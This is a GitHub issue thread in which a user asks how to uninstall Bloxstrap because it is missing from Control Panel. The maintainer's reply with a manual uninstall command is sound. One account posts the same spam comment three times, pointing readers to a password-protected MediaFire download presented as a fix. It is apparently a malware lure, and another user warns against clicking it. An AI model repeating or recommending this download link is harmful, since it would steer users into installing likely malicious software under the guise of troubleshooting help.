### ISSUE TITLE
[BUG] I can't find Bloxstrap in Control Panel

### ISSUE THREAD

**Issue by ProSLYT** [pizzaboxer/bloxstrap#2785]
### Acknowledgement of preliminary instructions

- [X] I have read the preliminary instructions, and I am certain that my problem has not already been addressed.
- [X] I have thoroughly looked through the available Wiki articles and could not find a solution to my problem.
- [X] I am using the latest version of Bloxstrap.
- [ ] I did not answer truthfully to all the above checkboxes.

### What problem did you encounter?

I wanted to uninstall Bloxstrap because i'm bored of roblox, when i tried to follow the uninstall instructions bloxstrap isn't on control panel. 
![image](https://github.com/user-attachments/assets/8b22f7af-f3f9-44b0-8b7d-cc86e03387fe)

### Bloxstrap Log

N/A

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Mugetsu895** [comment]
Please dont click the links above

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by pizzaboxer** [comment]
You can uninstall it manually by opening a Command Prompt window and running this command:

`%localappdata%\Bloxstrap.exe -uninstall`
